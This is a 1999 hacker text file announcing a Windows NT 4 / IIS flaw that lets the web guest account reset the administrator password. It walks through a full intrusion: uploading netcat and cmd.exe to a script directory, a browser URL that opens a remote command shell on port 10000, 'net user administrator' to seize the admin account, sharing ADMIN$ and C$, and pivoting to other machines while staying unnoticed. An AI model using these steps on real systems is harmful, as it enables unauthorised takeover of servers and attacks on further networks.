Internet User Bug Security Hole
-kon.

I've recently found a bug in NT 4 Server w/ IIS that allows the internet user (IUSR_COMPUTER)
to change any user's password, including the administrators, leading to total server
compromise.

How it's done:

The attacker must have access to the NT Server's web directory, along with an executable
directory. This could be accomplished via brute forcing a netbios share, ftp, cold fusion,
or other protocol/exploit to obtain a user's password. Checking access to the web 
directory, the attacker would upload nc.exe (http://www.l0pht.com/~weld/netcat/) and
cmd.exe to the executable directory (let's say cgi-bin, scripts, iisadmpwd, etc 
directories). By entering the following command into the web browser:

http://www.ntboxsomewhere.com/cgi-bin/cmd.exe?/c cgi-bin\nc.exe -L -p 10000 -t -e cmd.exe

They will have spawned a remote DOS shell on the Server on port 10000 (substitute '%20' 
for spaces if needed). The attacker then telnet's to 'www.server.com' at port 10000 and 
is dropped to a DOS shell spawned in the cgi-bin directory:

Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.

C:\InetPub\wwwroot\cgi-bin>

When telnetting to this port, you are the user that spawned the shell, the IUSR_COMPUTER
account. The next thing to try is the 'net' commands. This bug only works if 'net server 
stop' has been enacted by an administrator or other person with authority to do so. Here's
the bug: type 'net start server' and the IUSR_COMPUTER can start the server. Incidentally,
the IUSR_COMPUTER can also type 'net user administrator newpass' and will successfully
change the administrator's password.
If netlogon service didn't start with 'net start server', the attacker can now type 
'net start netlogon', and will now be able to map any drive to their computer. If need be,
the IUSR_COMPUTER can also share drives now, including 'ADMIN$', 'C$', etc.
After setting the administrator's new password and netlogon service, the next chain of 
events would be to administrate the remote computer's IIS using Internet Service Manager,
and simply change the IUSR_COMPUTER's account to 'administrator' and type in the new
password.
Next, spawn a new remote DOS shell via the web browser, as this process is now started via
the web user 'administrator'. The old shell was spawned under the IUSR_COMPUTER. While the
attacker compromises security in this way, he can not use the the IUSR_COMPUTER account
to 'net use \\ip_address\ipc$ /user:user password' from that box. Thus, the need for the
account with such priveleges.
Now, instead of just compromising the remote computer, the attacker can now use that
computer to attack other NT boxes. Include the use of various console DOS exploits, plus
ntreskit programs such as tlist.exe, kill.exe, netsvc.exe, etc, etc, their attack could go
relatively unnoticed.

I have not tried this with just uploading cmd.exe and net.exe and running the commands
thru the browser yet, minus the use of netcat.

Bug tested and works on all i've tried:
NT 4 Server + sp1, sp2, sp3, sp4 and IIS 2.0 + 3.0 + 4.0
I have not yet tried it with any combination not listed above.

I do not know of any patches/fixes for this.

Special thanks to: Weld Pond (http://www.l0pht.com/~weld)

Comments, flames, bitches, beer, pizza, and porno to konceptor@hotmail.com

6/10/99